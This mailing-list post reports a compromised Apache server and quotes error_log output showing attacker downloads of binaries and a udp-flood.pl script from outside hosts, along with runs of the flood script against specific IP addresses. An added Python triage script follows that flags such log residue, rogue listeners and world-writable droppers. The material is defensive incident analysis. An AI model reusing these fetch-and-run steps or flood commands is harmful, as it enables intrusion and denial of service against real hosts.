Ever since we found and stopped a phishing site that had been planted on our server to run as the default site under Apache, we have been under constant attack. Presumably, the perpetrators did not appreciate that we made their millions of scam emails ineffective. So, today I just happened to get a feeling that I should check for rootkits. Sure enough, someone had a listener at port 3049 and lsof showed the owner as being Apache. More investigation shows the following in /tmp:

-rwxrwxrwx 1 apache apache 34314 Jun 21 08:33 bash-
-rwxrwxrwx 1 apache apache 34346 May  3 17:30 httpp
-rw-r--r-- 1 apache apache  1089 Jun 20 16:05 udp-flood.pl
-rw-r--r-- 1 apache apache  1089 Jun 20 16:05 udp-flood.pl.1

And the following in the Apache error_log:

Syntax error on line 1194 of /etc/httpd/conf/httpd.conf:
ServerName takes one argument, The hostname and port of the server
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 34346  100 34346    0     0  91094      0 --:--:-- --:--:-- --:--:--  258k
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 34346  100 34346    0     0   143k      0 --:--:-- --:--:-- --:--:--  348k
sh: Aarhus: command not found
--07:49:08--  http://members.cox.net/linuxg0d/bash-
           => `bash-'
Resolving members.cox.net... 68.1.17.8
HTTP request sent, awaiting response... 200 OK

    0K .......... .......... .......... ...                  100%  334.35 KB/s

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  3 34314    3  1197    0     0   7737      0  0:00:04 --:--:--  0:00:04  7737
curl: (23) Failed writing body
bash-: no process killed
httpp: no process killed
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 34314  100 34314    0     0   100k      0 --:--:-- --:--:-- --:--:--  323k
sh: uname -a: command not found
sh: uname -a: command not found
--14:47:00--  http://members.cox.net/linuxg0d/bash-
           => `bash-.1'
Resolving members.cox.net... 68.1.17.8
HTTP request sent, awaiting response... 200 OK

    0K .......... .......... .......... ...                  100%  311.24 KB/s

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 34314  100 34314    0     0    97k      0 --:--:-- --:--:-- --:--:--  367k
--22:14:11--  http://coretecsystems.com:4660/udp-flood.pl
           => `udp-flood.pl'
Resolving coretecsystems.com... 68.5.101.205
HTTP request sent, awaiting response... 200 OK

    0K .                                                     100%   10.39 MB/s

sh: line 1: 12015 Terminated              perl udp-flood.pl 193.15.190.221 0 0

And then some hours later:

--10:16:10--  http://members.cox.net/linuxg0d/httpp
           => `httpp'
Resolving members.cox.net... 68.1.17.8
Connecting to members.cox.net[68.1.17.8]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34,346 [text/plain]

    0K .......... .......... .......... ...                  100%  290.01 KB/s

10:16:10 (290.01 KB/s) - `httpp' saved [34,346/34,346]

--19:31:24--  http://coretecsystems.com:4660/udp-flood.pl
           => `udp-flood.pl.1'
Resolving coretecsystems.com... 68.5.101.205
Connecting to coretecsystems.com[68.5.101.205]:4660... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,089 [text/plain]

    0K .                                                     100%   10.39 MB/s

19:31:24 (10.39 MB/s) - `udp-flood.pl.1' saved [1,089/1,089]

sh: line 1: 19530 Terminated              perl udp-flood.pl 130.243.43.30 0 0
----------------------------------------------------------------------------

It all appears to reveal that the perps were able to run some kind of upload program, although I am not familiar with the output. And, they are able to get Apache to execute the upload as if it were CGI. Oh yeah, and when the perl script, udp-flood.pl, fires off, you might as well just power down the box!

Todd Merriman
webmaster@xxxxxxxxxxxxxx
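The three things the post checked by hand (a listener owned by the web-server account, world-writable droppers in /tmp, and downloader/kill residue in error_log) can be turned into repeatable triage checks. The script below is an added example for this thread, not the poster's code and not part of any tool; the function names, the WEB_USERS and ALLOWED_PORTS sets and the lsof sample are assumptions made for the example, while the error_log and ls samples are copied from the post.

```python
"""Triage checks for the web-server compromise described in the post.

scan_error_log        - flag wget/curl progress output, "command not found" and
                        killed perl processes, none of which belong in error_log
suspicious_listeners  - LISTEN sockets held by the web-server account on ports it
                        should not own, parsed from `lsof -i -P -n` output
writable_executables  - world-writable executables owned by the web-server
                        account, parsed from `ls -l` output

Names and the two configuration sets are assumptions for this example.
"""
import re
from collections import Counter

WEB_USERS = {"apache", "www-data", "httpd"}   # assumed web-server accounts
ALLOWED_PORTS = {80, 443}                     # ports the web server may hold

# One regex per kind of residue; dict order is the match order per line.
INDICATORS = {
    "wget_fetch": re.compile(r"^--\d{2}:\d{2}:\d{2}--\s+(?P<url>\S+)"),
    "wget_saved": re.compile(r"- `(?P<file>[^']+)' saved \["),
    "curl_progress": re.compile(r"^\s*%\s+Total\s+%\s+Received"),
    "cmd_not_found": re.compile(r"^sh: (?P<cmd>.+?): command not found"),
    "killed_proc": re.compile(r"^sh: line \d+:\s+\d+ Terminated\s+(?P<cmd>.+)$"),
    "no_process_killed": re.compile(r"^(?P<name>\S+): no process killed"),
}


def scan_error_log(lines):
    """Return (line_no, indicator, detail) for each line matching an indicator.

    The first matching indicator wins; detail is the captured URL, file or
    command, or the stripped line when the pattern captures nothing."""
    hits = []
    for n, line in enumerate(lines, 1):
        for name, rx in INDICATORS.items():
            m = rx.search(line)
            if m:
                detail = next((v for v in m.groupdict().values() if v), line.strip())
                hits.append((n, name, detail))
                break
    return hits


def summarize(hits):
    """Count hits per indicator so a quick glance shows the pattern."""
    return Counter(name for _, name, _ in hits)


def suspicious_listeners(lsof_lines, web_users=WEB_USERS, allowed_ports=ALLOWED_PORTS):
    """From `lsof -i -P -n` lines, return (command, pid, user, port) for LISTEN
    sockets owned by a web-server account on a port outside allowed_ports.
    Columns: COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME (LISTEN)."""
    found = []
    for line in lsof_lines:
        if "(LISTEN)" not in line:
            continue
        parts = line.split()
        if len(parts) < 9:
            continue
        cmd, pid, user = parts[0], parts[1], parts[2]
        name = parts[-2]                        # e.g. "*:3049" or "[::]:80"
        port = int(name.rsplit(":", 1)[-1])
        if user in web_users and port not in allowed_ports:
            found.append((cmd, int(pid), user, port))
    return found


def writable_executables(ls_lines, web_users=WEB_USERS):
    """From `ls -l` lines, return regular files owned by a web-server account
    whose 'other' permission triple is both writable and executable."""
    out = []
    for line in ls_lines:
        parts = line.split(None, 8)
        if len(parts) < 9 or not parts[0].startswith("-"):
            continue
        mode, owner, name = parts[0], parts[2], parts[8]
        other = mode[7:10]                      # rwx bits for 'other'
        if "w" in other and "x" in other and owner in web_users:
            out.append(name)
    return out


# Sample error_log lines copied from the post, plus one constructed benign line.
SAMPLE_ERROR_LOG = [
    "--07:49:08--  http://members.cox.net/linuxg0d/bash-",
    "           => `bash-'",
    "Resolving members.cox.net... 68.1.17.8",
    "HTTP request sent, awaiting response... 200 OK",
    "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current",
    "sh: Aarhus: command not found",
    "bash-: no process killed",
    "sh: uname -a: command not found",
    "10:16:10 (290.01 KB/s) - `httpp' saved [34,346/34,346]",
    "sh: line 1: 12015 Terminated              perl udp-flood.pl 193.15.190.221 0 0",
    "[notice] caught SIGTERM, shutting down",    # constructed benign line
]
# Constructed lsof output modelled on the post's finding (port 3049, apache).
SAMPLE_LSOF = [
    "COMMAND   PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME",
    "httpd    1800   root    3u  IPv4  10234      0t0  TCP *:80 (LISTEN)",
    "httpd    1812 apache    3u  IPv4  10234      0t0  TCP *:80 (LISTEN)",
    "bash-    4101 apache    4u  IPv4  99871      0t0  TCP *:3049 (LISTEN)",
    "sshd      911   root    3u  IPv4   8120      0t0  TCP *:22 (LISTEN)",
]
# The /tmp listing copied from the post.
SAMPLE_LS = [
    "-rwxrwxrwx 1 apache apache 34314 Jun 21 08:33 bash-",
    "-rwxrwxrwx 1 apache apache 34346 May  3 17:30 httpp",
    "-rw-r--r-- 1 apache apache  1089 Jun 20 16:05 udp-flood.pl",
    "-rw-r--r-- 1 apache apache  1089 Jun 20 16:05 udp-flood.pl.1",
]

if __name__ == "__main__":
    for hit in scan_error_log(SAMPLE_ERROR_LOG):
        print("error_log line %d: %s -> %s" % hit)
    print("summary:", dict(summarize(SAMPLE_ERROR_LOG and scan_error_log(SAMPLE_ERROR_LOG))))
    print("listeners:", suspicious_listeners(SAMPLE_LSOF))
    print("droppers:", writable_executables(SAMPLE_LS))
```

On a live box the same functions take the real output: pipe `lsof -i -P -n` and `ls -l /tmp` through them and read the current error_log, and treat any hit as a reason to preserve the files and the process list before cleaning up, since the listener and the droppers are the evidence of how the web-server account was being driven.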